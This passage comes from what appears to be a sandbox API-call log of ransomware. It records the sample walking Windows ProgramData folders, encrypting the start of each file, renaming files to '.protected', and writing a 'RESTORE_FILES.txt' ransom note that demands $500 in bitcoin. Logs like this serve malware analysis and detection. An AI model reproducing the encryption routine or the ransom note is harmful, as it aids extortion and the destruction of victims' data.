lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0074.499] CloseHandle (hObject=0xd4) returned 1 [0074.500] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0074.500] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0074.500] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 110 [0074.500] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0074.500] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.500] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0074.501] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.501] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0074.501] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.501] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0074.501] CloseHandle (hObject=0xb4) returned 1 [0074.501] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0074.501] FindClose (in: hFindFile=0x490a28 | out: hFindFile=0x490a28) returned 1 [0074.502] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\RESTORE_FILES.txt") returned 101 [0074.502] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0074.502] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0074.502] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0074.503] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0074.503] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0074.503] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0074.503] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0074.503] CloseHandle (hObject=0xa4) returned 1 [0074.503] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0074.503] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="Windows") returned -1 [0074.503] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="Program Files") returned -1 [0074.503] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="Program Files (x86)") returned -1 [0074.503] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="$Recycle.bin") returned 1 [0074.503] lstrcmpiW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="System Volume Information") returned -1 [0074.503] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005") returned 82 [0074.503] lstrcmpW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2=".") returned 1 [0074.503] lstrcmpW (lpString1="{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005", lpString2="..") returned 1 [0074.503] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*") returned 84 [0074.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0074.503] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.503] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.504] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.504] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.504] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.504] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\.") returned 84 [0074.504] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.504] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.504] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.504] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.504] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.504] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.504] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.504] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\..") returned 85 [0074.504] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.504] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.504] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0074.504] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0074.504] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0074.504] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0074.504] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0074.504] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0074.504] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages") returned 91 [0074.504] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0074.504] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0074.505] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*") returned 93 [0074.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0074.506] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.506] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.506] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.506] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.506] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.506] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\.") returned 93 [0074.506] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.506] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.506] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.506] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.506] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.506] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.506] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.506] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\..") returned 94 [0074.506] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.506] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.507] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0074.507] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Windows") returned -1 [0074.507] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Program Files") returned 1 [0074.507] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="Program Files (x86)") returned 1 [0074.507] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="$Recycle.bin") returned 1 [0074.507] lstrcmpiW (lpString1="vcRuntimeAdditional_amd64", lpString2="System Volume Information") returned 1 [0074.507] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64") returned 117 [0074.507] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2=".") returned 1 [0074.507] lstrcmpW (lpString1="vcRuntimeAdditional_amd64", lpString2="..") returned 1 [0074.507] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*") returned 119 [0074.507] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0074.507] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.507] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.507] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.507] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.507] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.507] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\.") returned 119 [0074.507] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.507] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.507] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.508] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.508] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.508] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.508] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.508] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\..") returned 120 [0074.508] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.508] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.508] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.508] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0074.508] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0074.508] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0074.508] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0074.508] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0074.508] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0074.508] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0074.508] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0074.508] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.508] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.508] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.509] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0074.509] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0074.509] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0074.509] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0074.509] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0074.509] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0074.509] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.527] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.527] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.528] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.528] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.535] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0074.535] CloseHandle (hObject=0xd8) returned 1 [0074.536] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.protected") returned 136 [0074.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.protected")) returned 1 [0074.536] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0074.536] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Windows") returned -1 [0074.536] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Program Files") returned 1 [0074.536] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="Program Files (x86)") returned 1 [0074.536] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="$Recycle.bin") returned 1 [0074.536] lstrcmpiW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="System Volume Information") returned 1 [0074.536] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0074.536] StrStrIW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".protected") returned 0x0 [0074.536] lstrcmpW (lpString1="vc_runtimeAdditional_x64.msi", lpString2="RESTORE_FILES.txt") returned 1 [0074.536] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0074.536] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0074.536] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0074.537] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0074.537] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".txt") returned 0x0 [0074.537] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0074.537] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".rar") returned 0x0 [0074.537] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi") returned 146 [0074.537] StrStrW (lpFirst="vc_runtimeAdditional_x64.msi", lpSrch=".zip") returned 0x0 [0074.537] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.551] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.551] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0074.552] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.552] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0074.552] WriteFile (in: hFile=0xd8, 